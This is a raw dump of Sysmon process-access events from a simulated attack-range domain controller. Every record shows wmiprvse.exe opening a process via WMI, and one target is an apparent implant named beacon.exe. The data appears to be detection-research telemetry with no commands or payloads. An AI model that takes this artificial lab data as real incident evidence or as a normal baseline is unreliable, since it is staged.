10341000x80000000000000002246927Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.580{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246926Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.579{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246925Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.578{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246924Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.578{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246923Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.577{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246922Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.562{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246921Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.562{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246920Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.562{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246919Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.562{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246918Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.562{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246917Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.562{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246916Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.562{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246915Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.562{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246914Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.562{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246913Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.562{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246912Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.562{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246911Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.562{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246910Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.562{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246909Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.562{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246908Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.562{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.d